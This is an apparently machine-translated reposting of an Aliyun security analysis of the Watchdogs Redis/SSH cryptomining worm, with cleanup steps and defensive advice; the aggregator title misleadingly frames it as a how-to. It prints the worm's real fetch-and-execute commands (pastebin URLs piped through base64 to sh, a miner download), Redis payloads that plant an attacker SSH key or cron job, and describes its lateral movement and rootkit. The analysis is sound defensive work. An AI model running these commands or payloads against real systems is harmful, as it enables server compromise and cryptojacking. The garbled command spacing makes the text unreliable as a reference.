In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-01 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Servers >
Share
Shulou(Shulou.com)05/31 Report--
This article introduces how to use Watchdogs to implement large-scale mining, the content is very detailed, interested friends can use for reference, I hope it can be helpful to you.
Background
At about 17:00 on February 20, Aliyun Safety monitored a large-scale mining incident, determined that it was caused by the Watchdogs worm, and carried out emergency treatment at the first time.
The worm causes a large number of Linux hosts to fall in a short time. On the one hand, it uses two common configuration problems of Redis unauthorized access and weak password to spread, on the other hand, it reads the ip list from the known_hosts file, which is used to log in to other hosts that trust the host. Neither of these two means of transmission has been used for worms for the first time, but they combine to exert great power.
However, Watchdogs is not the first Redis worm to have such an impact. Up to now, Redis configuration problems have been attacked and exploited by more than 40 kinds of worms; in addition, the configuration problems of other kinds of databases will not be the target of hackers in the future.
Therefore, how to analyze the Watchdogs mining worm and provide cleaning suggestions, but also analyze the development trend of the database worm, and give suggestions for the emergency and prevention of similar large-scale intrusion events.
Brief introduction of Watchdogs mining worm
The infection path of the worm is shown in the following figure.
Cdn.com/2263586317fbd3bd3031398a8e039908aaa6f9f9.png ">
Worm propagation mode
The attacker first scans for Redis with unauthorized access or weak passwords, and controls the corresponding host to request the following address:
Https://pastebin.com/raw/sByq0rym
This address contains commands that request, base64 decode, and execute the contents of another url address:
(curl-fsSL https://pastebin.com/raw/D8E71JBJ||wget-Q-O-https://pastebin.com/raw/D8E71JBJ)|base64-d | sh
The content of https://pastebin.com/raw/D8E71JBJ is decoded into a bash script, which contains instructions to download the malicious program Watchdogs.
(curl-fsSL http://thyrsi.com/t6/672/1550667479x1822611209.jpg-o / tmp/watchdogs | | wget-Q http://thyrsi.com/t6/672/1550667479x1822611209.jpg-O / tmp/watchdogs) & & chmod + x / tmp/watchdogs
As shown in the figure above, the horizontal propagation of the worm is divided into two parts.
First, the Bash script contains the following contents, which will directly read the / root/.ssh/known_hosts and / root/.ssh/id_rsa.pub files on the host, which are used to log in to the machines that trust the current host and control these machines to execute malicious instructions.
The second is the Watchdogs program downloaded by the Bash script, which spreads horizontally through the unauthorized access and blasting of Redis and the blasting of SSH.
Specifically, in the Bbgo () function of the Watchdogs program, the list of ip to be attacked is first obtained
Then try to log in to the ssh service of another host, and execute the malicious script download command once the login is successful.
Malicious Bash script
In addition to downloading Watchdogs programs and horizontal propagation, Bash scripts also have the following functions
1. Add the instruction to download yourself to the crontab scheduled task and execute it every 10 minutes
Kill other processes that take up more than 80% of cpu
1.LibiosetWrite ()
This function mainly performs the writing of libioset.so files.
3.KsoftirqdsWriteRun ()
Decompress and write to the mining program and its configuration file
Here is an example of the unlink () function that must be called to execute the rm command.
It only calls the normal unlink () on files that do not contain the strings "ksoftirqds", "ld.so.preload" and "libioset.so", so that several files cannot be deleted normally.
Where the forge_proc_cpu () function returns a hard-coded string
And the mainstream methods of attacking Redis itself have gone through three stages.
1. Attackers write ssh key to Redis servers with unauthorized access, allowing them to log in to the ssh service without hindrance
Specifically, execute the following payload
Config set dir / root/.ssh/config set dbfilename authorized_keysset x "\ n\ n\ nssh-rsa [sshkey] root@kali\ n\ n\ n" save
Where [sshkey] represents the attacker's key
two。 Attackers write crontab files to Redis servers with unauthorized access and regularly perform malicious operations
Specifically, execute the following payload
Config set dir / var/spool/cronconfig set dbfilename rootset x "[evil command]" save
Where [evil command] indicates a malicious command executed on a regular basis.
3. In the above two stages, only the Redis can be accessed without authentication at all, and the third stage begins to attack the Redis with a weak password, which further expands the scope of the attack.
However, Redis is not the only database that has been hacked. As shown in the table below, the security problems of commonly used databases such as SQL Server, Mysql and Mongodb are also exploited by multiple mining botnets, focusing on unauthorized access, password blasting and vulnerability exploitation.
Methods of repairing and cleaning Watchdogs intrusion
1. First stop the cron service to avoid repeated downloading and execution of malicious files as a result of its continuous execution.
If the operating system can use the service command, execute
Service crond stop
If there is no service command, execute
/ etc/init.d/cron stop
two。 Then use busybox to delete the following two so files:
Sudo busybox rm-f / etc/ld.so.preloadsudo busybox rm-f / usr/local/lib/libioset.sosudo ldconfig
Busybox is a small set of unix tools, and many Linux systems are integrated when installed. It is used for deletion because the rm command that comes with the system needs to make dynamic so library calls, while the so library is maliciously hook and cannot be deleted normally, while the rm of busybox is statically compiled, so there is no need to call the so file, so it is not affected.
3. Clean up malicious processes
Sudo kill-9 `ps-ef | grep Watchdogs | grep-v grep | awk'{print $2} '`sudo kill-9' ps-ef | grep ksoftirqds | grep-v grep | awk'{print $2}'`
4. Clean up the cron-related files and restart the service by checking the following files and clearing them for malicious instructions:
/ var/spool/cron/crontabs/root/var/spool/cron/root/etc/cron.d/root
Execute after
Service crond start
Or
/ etc/init.d/cron start security recommendations
The acquisition of digital cryptocurrency relies on the nature of computing resources, which gives rise to the motivation and soil for hackers to carry out large-scale intrusions; database intrusions such as the Watchdogs worm are not the first and will not be the last. As a "write-as-you-write" platform, Aliyun provides a good security infrastructure and a wealth of security products to help users resist mining and intrusion, as well as the following security recommendations:
1. Before the intrusion occurs, strengthen the password of the database service, try not to open the database service on the Internet, or carry out access control (ACL) according to the actual situation. These measures can help effectively prevent mining, extortion and other attacks. At ordinary times, we should also pay attention to backing up data and pay attention to security product alarm.
two。 If it is suspected that the host has been invaded and mined, for users who know their own security, in the case of simple means of the attacker, they can lock the source of the intrusion by self-checking cpu usage, running processes, scheduled tasks and so on.
3. For attacks in which attackers use more hidden methods (such as this Watchdogs worm, which invalidates ps, top and other system commands), it is recommended to use Aliyun Security's next-generation cloud firewall product, which blocks malicious outreach and can configure intelligent policies, which can effectively help prevent intrusion. No matter how clever the attacker is in hiding on the host, downloading, digging, and bouncing shell require malicious outreach; the interception of the cloud firewall will completely block the attack chain. In addition, users can also directly block pastebin.com, thrysi.com and other websites widely used by mining worms through custom policies to block the intrusion.
On how to use Watchdogs to implement large-scale mining is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.